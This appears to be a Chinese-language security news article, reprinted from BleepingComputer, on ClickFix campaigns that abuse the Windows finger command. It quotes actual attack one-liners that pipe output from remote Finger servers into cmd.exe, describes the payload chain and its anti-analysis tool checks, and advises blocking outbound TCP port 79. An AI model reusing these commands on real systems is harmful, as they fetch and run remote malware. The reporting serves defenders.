歡迎登入資安人
若您還不是會員,請點選下方加入會員
忘記密碼
加入資安人會員
登入
新聞
觀點
專題
解決方案
活動
訂閱電子報
資安人粉絲團
聯絡我們
關於我們
合作詢問
隱私權政策
香港商法蘭克福展覽有限公司台灣傳媒分公司
110 台北市信義區市民大道六段288號8F
886-2-8729-1099
新聞
觀點
專題
解決方案
活動
訂閱電子報
登入
登入
訂閱電子報
新聞
觀點
專題
解決方案
活動
新聞
您現在位置 : 首頁 >
新聞
駭客濫用數十年前的 Finger 協定發動 ClickFix 攻擊
2025 / 11 / 20
編輯部
數十年歷史的 Finger 指令最近在資安威脅中捲土重來,攻擊者利用此協定在 Windows 裝置上遠端執行惡意命令。
Finger 指令過去用於查詢 Unix 與 Linux 系統上的使用者資訊,後來也被加入 Windows 系統。執行後會回傳使用者的登入名稱、姓名、主目錄、電話號碼、最後登入時間等基本資訊。儘管仍受支援,但與數十年前的普及程度相比,現今已很少被使用。
近期出現多起利用 Finger 協定的惡意攻擊活動,攻擊者透過遠端伺服器取得惡意指令並在受害裝置上執行。
早在 2020 年,研究人員就已警告駭客將 Finger 指令當作 Living Off the Land Binary(LOLBIN)來下載惡意軟體並規避偵測。
攻擊手法解析
10 月,資安研究人員 MalwareHunterTeam 分享了一個批次檔案樣本。該檔案執行後會使用「finger root@finger.nateams[.]com」指令從遠端 Finger 伺服器取得命令,再透過 cmd.exe 在本地執行。
Reddit 上有使用者發文警告遭遇類似攻擊。駭客偽裝成 Captcha 驗證頁面,誘騙受害者執行 Windows 指令來「證明自己是真人」。受害者在命令提示字元中輸入了以下指令:「cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are humanpress ENTER'」。
這種攻擊利用 Finger 協定作為遠端腳本傳遞機制。執行 finger 指令後,輸出內容會被導向 Windows 命令處理器 cmd.exe。取得的命令會執行以下動作:建立隨機命名的路徑、將 curl.exe 複製為隨機檔名、使用重新命名的 curl 下載偽裝成 PDF 的 zip 壓縮檔、解壓縮出 Python 惡意軟體套件。接著使用「pythonw.exe init.py」執行 Python 程式。最後回傳確認訊息給攻擊者伺服器,同時向使用者顯示假的「驗證你是真人」提示。
研究人員發現另一個進化版攻擊,使用「finger Kove2@api.metrics-strange.com | cmd」取得並執行類似指令。
此版本會先檢查受害系統是否存在惡意軟體分析工具,包括 filemon、regmon、procexp、Wireshark、Fiddler、IDA、x64dbg、OllyDbg、ProcessHacker 等
。若未偵測到這些工具,就會下載偽裝成 PDF 的 zip 檔案並解壓縮。不過這次解出的不是 Python 套件,而是 NetSupport Manager 遠端存取木馬(RAT)。攻擊者會設定排程工作,讓惡意軟體在使用者登入時自動啟動。
目前這類 Finger 協定濫用攻擊似乎出自單一駭客發動的 ClickFix 攻擊活動。對防禦者而言,最有效的阻擋方式是封鎖 TCP port 79 的對外流量,因為這是 Finger 協定 daemon 使用的連線埠。
本文轉載自 BleepingComputer。
Finger協定
ClickFix
LOLBIN
最新活動
2025.12.03
2025台灣資安通報應變年會
2025.11.20
從系統停擺危機到營運韌性:三道防線,讓你的系統不怕被勒索
2025.11.26
漢昕科技X線上資安黑白講【零信任X特權防護|掌握身份控管關鍵,讓駭客無從下手!】2025/11/26開講
2025.11.27
【研討會】零信任思維下的 Mac 生態:從合規到主動防禦(北中南三場)
2025.12.01
AI 轉型「深水區」如何突圍?善用 Google Cloud AI 利器,實現從核心流程到應用開發的全方位賦能
2025.12.05
聚焦半導體OT資安與產業連結:ISA臺灣分會 2025 年終會員交流聚會
2025.12.11
12/11-12/12【軟體開發安全意識與 .NET/Java 安全程式開發課程】兩日集訓班
看更多活動
大家都在看
雙重資安警報!Fortinet FortiWeb 零日漏洞遭利用、Akira 勒索軟體鎖定 Nutanix AHV
Microsoft 推出 2025年11月 Patch Tuesday 每月例行更新修補包
羅技證實遭 Cl0p 勒索集團攻擊!1.8 TB 資料外洩
飯店業成駭客新目標!大規模ClickFix釣魚攻擊散布PureRAT惡意軟體
runC容器執行環境爆三大漏洞,駭客可逃脫Docker容器並存取主機系統
資安人科技網
文章推薦
RondoDox 殭屍網路鎖定未修補的 XWiki 伺服器,擴大攻擊規模
捷豹路虎遭網路攻擊,損失超過2.2億美元
Cloudflare 近 6 小時服務中斷:分散式系統快速傳播機制成故障放大器